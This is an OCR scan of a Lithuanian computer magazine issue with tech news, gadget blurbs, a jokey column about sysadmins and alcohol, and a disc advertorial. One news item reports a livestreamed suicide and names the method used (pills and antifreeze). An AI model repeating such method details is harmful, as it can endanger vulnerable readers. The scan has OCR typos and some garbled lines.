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KAI KITI KOMPIUTERIŲ GAMINTOJAI 
GARANTIJĄ MAŽINA - ICG DIDINA 


VISIEMS ICG STACIONARIEMS 
KOMPIUTERIAMS 


Neseniai besiblaškydamas internete užtikau įdomių pasvarstymų apie sistemų administratorius: ir 
alkoholį. Pasirodo, anapus Atlanto kažkokie rimti dėdulės, tikriausiai nebesumąstę, koki dar galimo 
būtų atlikti visuomenei naudingą tyrimą, apklausė kelis tūkstančius respondentų, vienaip ar kitaip 
susijusių su kompiuterinių sistemų administravimu. Tyrimo rezultatai lengvai šokiravo, todėl nu- 
sprendžiau jais pasidalinti ir su tavimi, bet prieš tai privalau paminėti, kad informacija nėra iš labai 
patikimų šaltinių, o visi pasvarstymai neturėtų niekoip paveikti tavo požiūrio į alkoholį 

Tyrimo esmė buvo paneigti arba patvirtinti sistemų administratoriaus stereotipą. Dauguma 
pasaulio gyventojų sistemų administratorių įsivaizduoja kaip kelias savaites ar mėnesius nesiskutusi 
tipą su storais raginių rėmelių akiniais ant nosies, nuolatiniu alaus kvopu ir murmantį apie niekam 
nesuprontomus dalykus niekad negirdėtais terminais. Daugelis šių dalykų iš tiesų yra ne vieno 
admino kasdienybė, bet šiandien pašnekėsime tik apie vieną iš jų — alkoholį. 


Tyrimo rezultatai 

1. Alkoholį vartojantys žmonės turi taip vadinama „geriančiojo privalumą“. Alkoholis atpalaiduo 
ja ir palengvina bendravimą. Ypač tai pastebima per firmos vakarėlius, kai įnirtingai pradeda 
bendrauti darbuotojai, kurie darbinėje aplinkoje geriausiu atveju tik pasisveikina. Taip pat pasikei 
čia bendravimas su imonės valdžia, santykiai pasidaro draugiškesni, o toi gali būti pirmas postūmis 
karjeros laiptais. Pvz., firmos bosas pastebės tavo besiskleidžiantį tolentą ir apmokės kvalifikacijos 
kėlimo kursus. Ir vis dėlto alkoholis yra blogai... 

2. Antras punktos išskirtinai būdingos TIK sistemų administratoriams. Tyrimo duomenys parodė, 
kad alkoholį vartojantys adminai darbe užsisėdi ilgiau. (Tiesiog jiems būtina atidirbti darbo valan- 
das, nes dažniausiai miega ilgiau nei alkoholio nevartojontys bendradarbiai). Visiems gerai žinoma, 
kad kompiuterinių nusikaltimų, įsilaužimų žymiai pagausėjo vakarais. Užsisėdėjęs adminas gali tai 
pastebėti ir užkirti kelią or bent jau laiku sureaguoti. Ir vis dėlto alkoholis yra blogai 

3. Mažai kas iš specialistų gyvena izoliuotos nuo visuomenės, o alkoholį vartojančiajom lengviau 
rasti bendra kalba ar „isitrinti“ į tų počių kompiuterinių sistemų specialistų gretos. Toip jam 
atsiranda galimybė dalintis naudingomis žiniomis ir patirtimi. Rasti naujų naudingų pažinčių, kas 
taip pat gali nulemti jo karjerą. Ir vis dėlto alkoholis yra blogai. 

4. Jau seniai įrodyta, kad SAIKINGAS alkoholio vartojimas mažina stresą, nuovargį, leidžio 

naudingai „pratempti“ papildomas kelias valandas sėdint prie ilgai užsitęsusio projekto. Ir vis dėlto 
alkoholis yra blogai. 
5. Statistika rodo, kad alkoholį vartojančiųjų šeimyniniai gyvenimai klostosi prastai (nepainioti su 
rumpalaikiais romanais!), bet užsisėdėjimas iki nakties prie projekto, užtikrintas kopimas karjeros 
laiptais ir prieš tai išvardinti keturi punktai gali pagerinti finansinę padėti, o tai iš dalies atperka šio 
punkto trūkumus. Ir vis dėlto alkoholis yra blogai. 


Prisiminęs visus pažįstamus adminus, galėčiau pasakyti, kad alus tarp jų yra populiariausios Iš 
alkoholinių gėrimų. Pirmiausia — koip jau buvo minėto, tai bendravimo priemonė. Po sunkios 
darbo savaitės prie alaus bokalo susėdę adminai sugeba kalbėtis NE TIK apie darba, ir tai yra 
patikrintos faktas. Be visų aukščiau išvardintų punktų, alaus bokalas dar gali atgaivinti karštą 
vasaros dieną. Alaus bokalas gali... Ir vis dėlto alkoholis yra blogai, nes visas tas tyrimos tikriausiai 
buvo atliktas kokio nors admino alkoholiko, kuris bandė susirasti bent kokio priežosti pasiteisinimui... 
untitled 


Sveikatos apsaugos ministerija įspėja! 


Alkoholio vartojimas gali būti 


žalingas Jūsų sveikatai 
ir visuomenės gerovei. 
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Bet kokią programinę irangą. patarimus ar 
kitą informaciją naudojate SAVO PATIES 
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SAVIZUDŽIO REALYBĖS ŠOU 


Kokių tik mūsų laikais nėra realy- 
bės šou, pradedant klaidžiojimais 
po egzotiškas salas ieškant mais- 
to ir baigiant namo statybos bei 
tarpusavio santykių aiškinimosi 
procesu. Bet to, ką sugalvojo 21 
metų amerikietis Mitčelas S., dar 
niekas nerodė. Vaikinas nuspren- 
dė iškeliauti Anapilin, ir ne Šiaip 
sau, 0 viso interneto akivaizdoje. 
Tiesa, jo pasirinktas metodas ne- 
buvo kruvinas. On-line žaidimų mėgėjas prisipirko įvairių table- 
čių, apsirūpino mašininiu antifrizu ir žaidimų forume nurodytą 
dieną visa tai išmaukė. Daugelis žiūrovų manė, kad apie savo 
gyvenimo problemas, ketinimus baigti gyvenimą savižudybe ir 
po chemikalų suvartojimo pasireiškusius simptomus pasako- 
jantis vaikinukas tik juokauja. Tačiau kai jis eilinį kartą nepasi- 
rodė vaizdo Kameros objektyve, jie dėl viso pikto apsireiškė jo 
namuose. Bet buvo jau vėlu: sausio 7 dieną Mitčelas ligoninėje 
mirė. Policija tyrimo laikotarpiu uždarė Metalgearsolid.org sve- 
tainę, kurioje vargšelis aprašinėjo savo kančias, tačiau jos savi- 
ninkai tvirtino, kad jie neatsako už publikuojamą turinį ir negali 
sekti visų daugiau nei 5 tūkstančių lankytojų siunčiamų žinučių. 


Diuuicide Dandbook 


MILIJONO DOLERIŲ 
VERTOS SVETAINĖS REKETAS 


Jeigu tu prekiauji turguje, 
turėtumei žinoti, kad tur- 
gaus direktorius — ne pats 
baisiausias priešas. Tikra- 
sis blogis — reketininkai. 
Prieina prie tavęs toks di- 
delis raumenų kalnas spor- 
tininkas ir prašo krūvos pi- 
nigų UŽ neva apsaugą nuo 
kitų raumeningų sportininkų. Tenka dalintis. Mūsų laikais reketas 
jau išėjo už turgų sienų ir persikėlė į internetą. Tipišku pavyzdžiu 
tapo nesenai nutikęs atvejis, kurį teko patirti Aleksui Tjū, 21 metų 
studentui, svetainės, kuri jį padarė milijonieriumi, autoriui. Svetai- 
nės idėja buvo paprasta: Aleksas puslapyje sukūrė tinklelį iš 10 
tūkstančių kvadratėlių, kiekvienas kurių buvo 10x10 dydžio. Bet 
kuris pageidaujantysis viename iš šių kvadratėlių gali įdėti rekla- 
mą Su nuoroda į savo svetainę. Masinio informavimo priemonių 
dėmesys svetainę padarė žinoma, todėl atsirado nemažai pagei- 
daujančiųjų čia palikti savo reklamą. Britų studentas per vos 4 
mėnesius iš reklamos uždirbo milijoną dolerių. Štai čia ir pasiro- 
dė „broliukai“. Virtualūs sportininkai kukliai paprašė 5 tūkstan- 
čių, priešingu atveju grasindami nulaužti svetainę. Aleksas atsi- 
sakė mokėti, ir sausio 10, kai baigėsi jam skirtas laikas, ant 
www.milliondollarhomepage.com pasipylė žiauri DDOS ataka. Pa- 
rodę, kad jie nejuokauja, prievartautojai dar kartą susisiekė su 
savininku ir šį kartą pareikalavo 50 tūkstančių. Po to Aleksas 
kreipėsi į policiją. Surasti hakerių teisėsaugininkams kol kas nepa- 
vyko. Kalbama, jog jų pėdsakai veda į Rusiją. 
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STAMBI ŽUVIS 


Kompiuterių pogrindyje 
sklando kalbos, kad policija 
nieko nesugeba, 0 jeigu II 
gaudo hakerius, tai tik tuos, 
kurie vagia modemų prisijun 
gimo slaptažodžius. Tačiau 
Ispanijoje pareigūnai eilinį 
kartą įrodė, kad jie dar kaž- 
kam tinkami. Sausio vidury 
je šioje šalyje buvo areštuo 
tas vietinis gyventojas, įtariamas prisidėjęs prie tinklo atakos 
prieš amerikiečių atominius povandeninius laivus valdančios 
karinės bazės Point Loma kompiuterius. Tiesa, įsilaužėlį suse- 
kė ne ispanai, o FTB. Pranešime spaudai taip pat buvo pasa- 
kyta, jog įmanoma, kad šis hakeris yra vienos grupuotės narys, 
kuri ne kartą atakavo įvairių šalių karines Kompiuterių siste 
mas ir kurios sukelta žala apie 500 tūkstančių dolerių. Kol 
kas policija renka kaltės įrodymus ir jeigu ispanas teisme bus 
pripažintas kaltu, tai nedidele bauda jis tikrai neatsipirks. 


KOVOTOJAS SU SPAMU PATS 
PASIRODE ESĄS SPAMERIS 


JAV daug įvairių kovotojų su spamu. Vienas iš jų generali- 
nis Floridos valstijos prokuroras, kuris tapo žinomas dėl ne- 
sitaikstančios kovos su pagrindiniu tinklo blogiu. Čarlis Kris- 
tas kadaise prastūminėjo įstatymą, pagal kurį spameris už 
kiekvieną išsiųstą laišką turėtų gauti iki 500 dolerių baudą. 
Tačiau po to, kai Floridoje prasidėjo gubernatoriaus rinkimai, 
o prokuroras taip pat iškėlė savo kandidatūrą, jo antispa- 
meriškos aistros nurimo. Dar daugiau, paaiškėjo, kad prieš- 
rinkiminėje kampanijoje save aukštinančių reklaminių Žinu- 
čių siuntinėjimas yra viena iš pačių efektyviausių priemonių. 
Taigi Čarlis kartu su savo svita suorganizavo masinį žinučių 
siuntinėjimą, žadėdamas nežemiškas gėrybes. Kandidato | 
gubernatoriaus postą spa- 
mas buvo siunčiamas net ir 
po to, kai tam tikri per prie- 
vartą šias žinutes gaunan- 
tys adresatai keletą kartų iš- 
siuntė prašymą liautis siun- 
tinėjus tokią priešrinkiminę 
mMakulatūrą. Floridoje apie 
„aršų kovotoją su spamu“ 
jau kuriami anekdotai, ta- 
čiau Kristo bendražygiai sa- 
vo vadovo spameriu visiškai 
nelaiko. Pagrindinis jų argu- 
mentas skamba taip: „Pa- 
gal valstijos įstatymus, spa- 
mas — tai gavėją klaidinan- 
čių pranešimų siuntinėjimas, 
o Čarlio vardu siuntinėjamuo- 
se laiškuose yra tik tiesa ir nie- 
ko daugiau, išskyrus tiesą“. 
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FIRST | PERSONAL SHOOTER 


Kompanija „Starnex“, kuri specia- 
lizuojasi vaizdo stebėjimo sistemų 
gamyboje, anonsavo ganėtinai įdo- 
mų įrenginį, kuris vadinasi Self 
Guard SG-310 ir yra skirtas spe- 
cialiai armijai. Šiek tiek keistos 
formos įrenginys turėtų būti tvirti- 
namas ant ginklo ir nepertraukia- 
mai transliuoti vaizdą per įmon- 
tuotą vaizdo kamerą. Kam viso to 
reikia? Kad gudresnis vadas, į ku- 
rio analogišką įrenginį ir bus per- 
duodamas šis vaizdas, galėtų ste- 
bėti savo karių veiksmus bei duo- 
ti jiems vertingų patarimų apie tai, 
kaip pasielgti vienoje ar kitoje su- 
dėtingoje kovinėje situacijoje. Beje, vadui taip pat nepavyks 
pasėdėti minkštoje kėdėje už kelių kilometrų nuo mūšio vie- 
tos esančiame komandiniame punkte, nes vaizdas bus tran- 
sliuojamas per Bluetooth, o su juo gali būti ne toliau nei už 
100 metrų. 


„SONY“ ŽYGIUOJA TOLIAU 


Tikriausiai kiekviena kompanija turi tam tikrą įrenginių seriją, 
kurios pavadinimas dėl įrenginio kokybės ir populiarumo žino- 
mas labai plačiam žmonių ratui, įskaitant ir tuos, kurie nė 
nenutuokia apie šių įrenginių specifikacijas. „Sony“, be jokios 
abejonės, tokiems priskirtų WALKMAN grotuvus, kurių pavadi- 
nimas kartais naudojamas kaip bendrinis daiktavardis. Dabar 
sukurtas naujas unikalaus dizaino WALKMAN. Jo pagrindą gali 
sudaryti 6 arba 20 Gb talpos kietasis diskas, 0 1,5 arba 2 
colių įstrižainės ekranas (priklausomai nuo modelio) patogiai 
atvaizduoja vartotojo Meniu, 
kuriame galima rasti daugybę 
funkcijų. Visa tai tikrai įvertins 
tie, kurie negali gyventi be mu- 
zikos. Be viso kito, įrenginys 
taip pat turi daugiafunkcinės 
dainų paieškos pagal skirtin- 
gus parametrus galimybę. Įren- 
ginys veikia su dviem bylų for- 
matais MP3 ir ATRAC3plus 
(firminis „Sony“ formatas). 
Taip pat galima dirbti su pro- 
grama CONNNECT Player, kuri 
leidžia per internetą atnaujinti 
kodekus ir firmware, bei su to 
paties pavadinimo mokamu 
dainų siuntimosi servisu. Par- 
duodami modeliai gali būti 
skirtingų spalvų, grotuvui taip 
pat yra skirta daugybė aksesu- 
arų: nuotolinio valdymo pulte- 
lis, dock-station ir kita. 


sONY 


Plavini 
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KALBANTI PELĖ 


Pastaruosius metus vienareikšmiškai galima laikyti interne 
tinės telefonijos sužydėjimo periodu. Fenomenalus tokių 
programų kaip Skype populiarumas privertė gamintojus ieš- 
koti būdų, kaip telefoną priderinti prie kompiuterio, geriau- 
sia su kokiu nors kombinuotu įrenginiu. Savaime supranta 
ma, taikiklyje atsidūrė pelė, kadangi prie ausies dėti klavia 
tūrą arba monitorių yra išties kvaila. Dešimtys gamintojų, 
taip pat ir „Sony“, pristatė savo įrenginius, kurie pagrinde 
išsiskiria tik savo vargingumu, o vienintelė padorų įrenginį 
sugebėjusi išleisti kompanija pasirodė besanti mažai žino 
ma Taivanio firma „Sysgration“. Įrenginys (priešingai nei kon 
kurentų gaminiai) ne tik išoriškai primena normalų pelės 
tipo Manipuliatorių, bet ir yra neblogas Vo/P telefonas. Po 
atsidarančiu išoriniu dangteliu slepiasi pilnavertis skystųju 
ryšio telefono kla- 
viatūra. Be viso šito, įrenginys dar ir belaidis, dėl ko jis ga 
lutinai lenkia visus kitus konkurentus. Įrenginys kol kas dar 
nepasiekė parduotuvių lentynų, o gamintojai dar nenuspren 
dė, kiek jis kainuos, tačiau jie neabejoja savo gaminio sėk 
me ir tikisi šiais metais iš to neblogai uždirbti. 


kristalų ekranėlis ir standartinė mobiliojo 


„SAMSUNG“ IR „NAPA“ 


„Intel“ toliau plėtoja savo mobiliąją Centrino platformą, 0 jos 
paskutinė versija vadinasi Core Duo. Savaime si ind ntama, 
nešiojamųjų kompiuteriu gamintojai tokiam įvykiui negali ne- 
skirti dėmesio, o „Samsung“ viešai paskelbė + ein apie 
tuos modelius, kurie pasirodys kovą ir naudos naująją techno 
logiją. Modelių pavadinimai: X60, R65, P50, P60. Visuose 
juose bus sumontuotas dviejų branduolių procesorius, Intel 
945 Express mikroschemų rinkinys ir Wi-Fi adapteris. Be to, 
visa ši ketveriukė turės belaidę Bluetooth 2.04+EDR sąsają. 
X60 kompiuteris su 15,4 colio pla- 

čiaformačiu ekranu turi nuo drėgmės 
apsaugotą klaviatūrą, gigabitinę tin- 
klo plokštę ir universalų optinį įrengi- 
nį. R65 modelis be viso kito gali pa- 
sigirti galinga vaizdo plokšte nVidia 
GeForce Go 7400. Visi šie Modeliai 
taip pat turi aštuonių kanalų garso ko- 
deką. Verslo segmentą atstovauja 
P50 ir P60 modeliai, kurių 
ekranų kraštinių santy- 
kiai yra 4:3 ir 16:10. 
Laukiame pavasario ir 
šių Kompiuterių. 
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ATSITIKTINIS PAŽEIDŽIAMUMAS? 


Daugelis programose aptinkamų pažeidžiamumų nurašomi pro- 
gramuotojų neatidumui ir kodo neišbaigtumui. Iš tiesų, sunku 
viską numatyti, kai tu rašai 100 tūkstančių eilučių kodo. Ta 
čiau saugumo ekspe ir nuosavos security kompanijos va- 
dovas Styvenas Gibsonas mano, kad viena iš paskutinių Win- 
dows sistemoje surastų skylių atrasta visiškai neatsitiktinai. 
Kalbama apie WMF formato vaizdų apdorojimą, kuris šiuolai- 
kinėje sistemoje, Gibsono nuomone, iš viso nereikalingas. O 
pratęsdama jo naudojimą „Microsoft“ lyg ir susikuria papildo- 
mą skylę, kad prireikus per ją gautų priėjimą prie savo vartoto- 
jų kompiuterių. Beje, Styveno mintys tarp kolegų nėra palaiko 
mos. Slashdot'e jį draugiškai išjuokė ir išvadino paranojiku, 
kuris visur mato sąmokslą. iDefence direktoriaus Maiklo Sjū 
tono nuomone, panaši rizika kompanijai „Microsoft“ nėra pa- 
teisinama, be to, jeigu šis IT monstras ir norėtų pasilikti skylę, 
tai pasirinktų ne tokią pastebima vietą. Pati „Microsoft“ Gibso- 
no pareiškimo kol kas niekaip nekomentavo, o tik pažadėjo 
kuo greičiau pašalinti pažeidžiamumą. 


PIRATŲ MITINGAS 


„Reikalaujame antipiratinių represijų atšaukimo!“, „Duokite 
liaudžiai piratinį warezą!“, „Mano šeima badauja, neatimkite 
Iš Manęs uždarbio!“ — su tokiais plakatais neseniai į gatves 
išėjo keletas dešimčių San Salvadoro miesto gyventojų. Tokio 
mitingo priežastimi tapo įstatymų projekto pakeitimai, leidžian- 
tys policijai konfiskuoti bet kokias licencijos neturinčias pre- 
kes. Visų pirma tai pasakytina apie piratinius filmus ir muziką, 
o po to eina ir programinė įranga. Naujasis įstatymas buvo 
įvestas 2005 metų pabaigoje, o policija jau spėjo juo pasi- 
naudoti reidų prieš piratinius taškus organizavimui. Piratai ne- 
sugebėjo susitaikyti su tokia padėtimi ir, pasiėmę transparan- 
tus, išėjo į miesto gat- 
ves Kovoti už savo tei- 
ses. Įdomu tai, jog pre- 
zidentas Antonio Saca 
Gonzalez jų neišvaikė, o 
net pažadėjo pagalvoti, 
kaip jiems padėti, kad 
pardavėjai galėtų dirbti 
ir toliau, tik jau su Ie- 
galia produkcija. 
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SAVANORIŠKA KOMPENSACIJA 


Spameriu teismai dabar 
vyksta visame pasaulyje, o atve- 
Jai, Kuomet spameris pripažįsta 
savo kaltę Ir yra pasiruošęs susi- 
4 tarti bei išmokėti aukai kompen 
sacija greičiau išimtis. Didžio 
joje Britanijoje kaip tik 
įvyko toks taikos susitarimas. Fir 
ma „Media Logistics UK“ iš brito 
Naidželo Robertso gavo kvietimą 
į teisma, kadangi jam buvo reguliariai siunčiami reklaminiai pra- 
nešimai. Naidželas nesiruošė įsitraukti į ilgus ir sudėtingus aiš- 
kinimus, todėl vietoje kompensacijos pareikalavo viso labo 300 
svarų. „Media Logistics“ taip pat nenorėjo tampytis po teismus, 
todėl sutiko išmokėti šią sumą neteismine tvarka. Po tokio san- 
dėrio patenkintos liko visos pusės. Naidželas užsidirbo alaus 
bokalui, o ML atsipirko lengvu išgąsčiu. 
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HI-TECH'AS 
TEISĖSAUGOS TARNYBOJE 


Pastaruoju metu nelaimėlių vagišių gyvenimą vis dažniau ir daž- 
niau gadina hi-tech'iniai daikčiukai, kadangi judesio davikliai ir 
paslėptos vaizdo kameros apie įsilaužimą akimirksniu praneša 
policijai, o automobiliai su įmontuotais GPS moduliais kelių met- 
rų tikslumu išduoda pagrobėjo buvimo vietą. Neseniai eilinis 
recidyvistas Thomas R. Fricks įsibrovė į vieną iš Washington Trust 
Bank skyrių, Holivudo stiliumi paguldė visus ant grindų ir. gra 
sindamas ginklu, pareikalavo kasininko prikrauti pilną maišą pi- 
nigu. Iš pirmo žvilgsnio, ši vagystė buvo įvykdyta tiesiog neprie- 
kaištingai, tačiau vos po kelių valandų nustebęs plėšikas jau 
gulėjo ant žemės, 0 jo rankas puošė antrankiai. Paaiškėjo, kad 
vos tik plėšikas nukreipė dėmesį, pinigus į krepšį dėję banko 
darbuotojai kartu su banknotų šūsnimis įdėjo ir nedidelį GPS 
siųstuvą. Po to nusikaltėlio sulaikymas teisėsaugos pareigūnams 
buvo vien tik technikos klausimas. 


SPECIALIŲJŲ TARNYBŲ 
DARBUOTOJŲ PROBLEMOS 


Gerą naujametę dovaną specialiosioms tarnyboms padovanojo 
amerikiečių kompanija „Guidance Software“, kuri specializuojasi 
JAV teisėsaugos struktūrų informacinio saugumo užtikrinime. Pa- 
aiškėjo, jog duomenų bazėje, kurioje saugoma informacija apie 
beveik 4 tūkstančius NSA, FTB ir CŽV agentų, yra pažeidžiamu- 
mas, dėl ko kiekvienas inteneto vartotojas ja 
gali pasinaudoti ir taip sužinoti amerikietiškųjų 
džeimsų bondų vardus, adresus ir kreditinių kor- 


telių numerius. Be abejo, GS klientai pasipikti- 
no, kadangi jie manė, jog sistema yra nepri- 
ekaištinga ir į ją neimanoma įsibrauti. Kompa- 
nija pažadėjo kuo greičiau pašalinti šį pažei- 
džiamumą, tačiau galbūt duomenų bazėje jau 
spėjo pasirausti koks nors landus hakeris? 
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KOMPANIJA „SEAGATE“ 
NUSIPIRKO „MAXTOR“ 


Šiandien kietųjų diskų rinkoje rimtų žaidėjų, kurie realiai turė- 
tų jai įtakos, nėra daug. O neseniai jų pasidarė dar mažiau, 
kadangi „Seagate“, pagarsėjusi savo Barracuda serijos kietai- 
siais diskais, parodė bara- 
kudos vertą apetitą ir nu- 
pirko ne mažiau žinomą 
kompanija „Maxtor“. Be 
abejo, jeigu tu nesi vienos 
iš šių kompanijų akcinin- 
kas, tau tiesiogiai tai nė 
motais, tačiau ir eiliniam 
vartotojui tokius dalykus ži- 
noti pravartu. Taip pat „Se- 


angesnius kaupiklius ir 
iš viso pradėti naują savo 
egzistavimo erą. Tikėkimės, 
jog nauji kietieji diskai bus 
kokybiški ir prieinami eili- 
niam vartotojui. 


VIRTUALUS SKENERIS 


www.scanr.com svetainėje neseniai buvo paleistas visiškai uni- 
kalus servisas, skirtas fotoaparatus turintiems mobiliesiems te- 
lefonams ir kišeniniams kompiuteriams. Nufotografavus bet kokį 
dokumentą arba užrašą ir išsiuntus vaizdelį nurodytu adresu MMS 
formatu arba elektroniniu paštu, po keleto minučių tu atgal gausi 
atpažintą ir išvalytą tekstą su paveiksliukais, Kurie bus maloniai 
supakuoti į PDF bylą. Lygiai taip pat galima užsisakyti dokumen- 
to siuntimą faksu arba elektroniniu paštu bet kokiu nurodytu 
adresu. Kadangi įmontuoti fotoaparatai paprastai neišsiskiria 
gera kokybe, tai su šia paslauga suderinami tik tie įrenginiai, 
kurių skiriamoji geba ne mažesnė už vieną megapikselį. Prakti- 
nių šios paslaugos panaudojimų galima prigalvoti kiek tik nori ir 
dar truputį, tačiau perduodamos informacijos konfidencialumas 
kelia daug abejonių. Beje, ši paslauga veikia tik nemokamu teks- 
tiniu režimu Ir ja pasinaudoti galima tik JAV teritorijoje. 
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DVIAKIS 


Pasitikite eilinį įrenginį iš srities „pirmasis pasaulyje...“. Taigi 
pirmasis pasaulyje fotoaparatas su dviem objektyvais! Sį tech- 
nikos stebuklą CES 2006 parodoje anonsavo kompanija „Ko- 
dak“. Iš karto iškyla logiškas klausimas: kokio velnio fotoapara 
tui prireikė dviejų objektyvų? Savaime suprantama, taip pada 
ryta ir šmaikštumo dėlei, bet ne tik. Vis dėlto yra praktinis to- 
kios naujovės tikslas. Sumontuoti objektyvai tarpusavyje paste- 
bimai skiriasi savo savybėmis: vieno iš jų fokusavimo atstumas 
yra fiksuotas, o kitas vaizdą gali padidinti trigubai. Tuo pačiu 
kiekvienas objektyvas turi nuosavą 5 megapikselių CCD matri- 
cą. Finale šis fotoaparatas, priešingai nei kiti modeliai su vienu 
objektyvu, nėra priverstas ieškoti kompromiso tarp kokybiško 
darbo plačiakampiu režimu ir gero optinio didinimo, nes visa tai 
jame harmoningai suderinta. Šiuo metu EasyShare V570 mo- 
delis jau turėtų būti parduodamas, jo orientacinė kaina apie 
400 dolerių. 


- 


ŽMONIŲ IEŠKIKLIS 


Realių kovinių veiksmų miesto kvartaluose sąlygomis gyvybiškai 
svarbu žinoti, ar patalpoje, į kurią reikia įeiti, kas nors yra. DAR 
PA agentūra prie JAV gynybos ministerijos šioje srityje tyrimus 
atlikinėjo jau keletą Metų ir galų gale darbų rezultatai buvo iš- 
slaptinti. Sukurtas įrenginys (Radar Scope) žmones gali aptikti 
net per 12 colių betonines sienas iki 50-ties pėdų atstumu. 
Teroristai gali būti aptikti, jeigu jie bent kvėpuoja. Įrenginio ga- 
baritai visiškai atitinka kišeninius, o jo kaina svyruoja ties vienos 
tonos dolerių riba. Jeigu su įrenginio gamyba neiškils jokių pro- 
blemų, tuomet Irake esantys amerikiečių kariai taktinį pranašu- 
mą gaus jau šį pavasarį. Tikėsimės, kad gamintojai susiprotės 
armijai skirtus įrenginius panaudoti ir taikiems tikslams, pavyz- 
džiui, žmonių paieškai po griuvėsiais. 
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Iššūkis skaitmeniniam pasauliui 

PRABUDĘS PIRMĄ ŠIŲ METŲ PAVASARIO RYTĄ IŠGIRDAU „GUTEN TAG“. KAS TAI? NACIONALI- 
NIO VOKIETIJOS RADIJO DIKTORIAUS BALSAS? NE, TAI NAUJOKO, VARDU /NTENSO, PASIRO- 
DYMAS PRIE MŪSŲ LAUKO DURŲ. NORS PASAULIS ŠĮ VARDĄ LINKSNIUOJA JAU NUO 1998 
METŲ, MES, LIETUVAIČIAI, SUSIPAŽINTI SU JUO IŠ ARČIAU GALIME TIK DABAR. PATS VARDAS 
INTENSO KILĘS NUO ANGLIŠKO ŽODŽIO , „INTENSE“, KURIS REIŠKIA GALINGĄ, AISTRINGĄ IR 
PASITIKINTĮ SAVIMI. TOKIAIS PAT ŽODŽIAIS GALIMA APIBŪDINTI IR DAUGUMĄ, „INTENSO“ GA- 
MYKLOS DARBUOTOJŲ, KURIE YRA JAUNI IR PASIRUOŠĘ SUKURTI KĄ NORS IŠTIES NOVATO- 
RIŠKO, IKI ŠIOL NĖ NENUMANYTO. PAGRINDINIS KOMPANIJOS , „ĮINTENSO“TIKSLAS — GE- 
RIAUSIA KOKYBĖ UŽ ITIN PALANKIĄ KAINĄ, TODĖL MES IŠ KARTO GRIEBIAME JAUTĮ UŽ RAGŲ. 
PAŽIŪRĖKIM, AR KOMPANIJA „INTENSO“ IŠTIES TOKIA „KIETA“, KOKIA DEDASI. 


[Pirmieji įspūdžiai] Nuo pirmųjų savo gyvavimo minu- 
čių „Intenso“ užsibrėžė ne tokį jau paprastai pasiekia- 
mą tikslą — tapti lydere optinių laikmenų rinkoje. Pirmi- 
niais uždaviniais tapo kuo platesnio produktų asorti- 
mentų sukūrimas — galime paliudyti, jog šį darbą jie 
atliko itin kruopščiai. Kompanija „Intenso“ pirmoji pa- 
saulyje pasiūlė taip vadinamus „cake'us“ - plastikines 
dėžutes, kuriose ant centrinio veleno sumauta 25, 50, 
100 ar net 150 tuščių diskų. Plonosios dėžutės (slim- 


cases), popieriniai vokeliai ir dvigubi dėkliukai diskams taip 
pat „Intenso“ „sapalionės“, kurios ilgainiui tapo mūsų kasdieni- 
niais dalykais. Įdomu, ką šiuo metu kuria „Intenso“? 


Ogi labai nemažai — šalia standartinių, tačiau išties koky- 
biškų CD-R ir CD-RW diskų gaminami padidintos talpos (800 
MB arba 90 min.) taip vadinami „juodieji“ diskai, kurie. Jie 
taip pavadinti, nes iš tiesų yra juodos spalvos. Mes mylime 
pastarąjį išradimą, nes toks diskas atrodo kaip sumažintas 


vinilas, 0 tai, kas sena arba dvelkia senove, da- 
bar tampa mados ir stiliaus detale. Platus ir 
DVD diskų asortimentas: „Intenso“ kompa- 
nija gamina ir DVD-high-speed, ir DVD 8 
cm, ir DVD-R bei DVD+R diskus, todėl 
sunku pasakyti, ko jie negamina. Galbūt 
diskelių? 


[Svarbiausia — kokybė!] Norėdama 
peršokti ir net pakelti šiandieninę koky- 
bės standartų kartelę, kompanija „Inten- 
so“ nuolatos investuoja į inovacijas. Kadaise 
tokios investicijos padovanojo ypatingai revoliucinį dė- 

žučių sprendimą taip vadinamą „kick-out“ dėklą. Kompa- 
nijos teigimu, būtent toks dėkliu- 
kas yra pats optimaliausias va- 
riantas saugant duomenis mūsų 
kompaktiniuose diskuose. Šiuo 
metu tokiose dėžutėse galima 
rasti visus įmanomus diskų tipus. 
Tiesa, jau minėtas „juodasis dis- 
kas“ taip pat yra išskirtinis tai 
aukščiausią duomenų apsaugą 
užtikrinantis diskas rinkoje šiuo 
metu, nes jį testuoja ne bet kas, 
o pati „Stiftung Warentest“ orga- 
nizacija, kuri ir sukurta tam, kad 
testuotų produktus bei Mums, var- 
totojams, atskleistų visą tiesą apie 
jų kokybę. Visi „Intenso“ produktai 
kartkartėmis vedami pas „dakta- 
rus“, t.y. periodiškai atliekamas 
neplanuotas tam tikros produkci- 
jos partijos kokybės testavimas. 
„Intenso“ taip pat teigia, jog savo 
gamykloje turi susistačiusi kone vi- 
sų pasaulio firmų aparatus, kuriais 
taip pat išbando savo diskus tai tikrų tikriausia laboratorija, 
kurioje klonuojami unikalūs ir kokybiški diskai. 


[Intenso, ką gi tu mums siūlai?] Į šį klausimą Intenso at- 
sako nė nepagalvojusi — „viską, mano mielas drauge, viską". 
Patikriname, ar mums nemelavo - panašu, kad Intenso iš 


bandyk INTENSO nemokamai! 


tiesų gamina visų įmanomų tipu diskus. Mes 
nekalbame apie standartinius CD-R, CD- 
RW ar DVD. Mes randame tokius speciali- 
zuotus produktus, kaip CD-R FMO (“For 
Music Only"), „gigabaito talpos kibirėlį“ 
(150 CD-R diskų viename „cake'e“), CD- 
R Print (su specialia danga kurti savo 
piešinėlius bei grafinį apipavidalinimą) 
bei mini DVD (!). Pastarasis diskas yra 
vos 8 cm skersmens ir talpina arba 1,4 
GB duomenų, arba 30 min. vaizdo įrašo. Jį 
„supranta“ tiek paprasti grotuvai, tiek Kompiu- 
terio diskasukiai, todėl ši naujiena yra labai patogus 
būdas „nešiotis“ trumpus filmukus arba keleto vakarėlių nuo- 
traukų archyvus. Tiesa, minėtas CD-R Print taip pat žavi savo 
unikalumu - tai ypatinga paviršių turintys diskai, kuriems „vei- 
duką“ sukurti gali dauguma modernių ir suderinamų spaus- 
dintuvų (pvz.: Canon Pixma serijos spausdintuvai). Kartu su 
diskais gavome ir tam tikrą į aerozolinį dezodorantą panašų 
flakoną, todėl kiek sutrikome, kai sužinojome, jog jis skirtas 
apipurkšti ant diskų atspausdintus paveikslėlius. Ah, Inten- 
so, tu mus stebini nuo pirmos minutės... 


Įsigijęs kitą HAKERIO numerį, dovanų gausi INTENSO CD-R! 
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Vienos paieškos 


sistemos istorija 


1938 METAIS ŽURNALE „SCRIPTA MATHE- 
MATICA“ BUVO ISSPAUSDINTAS AMERIKIE- 
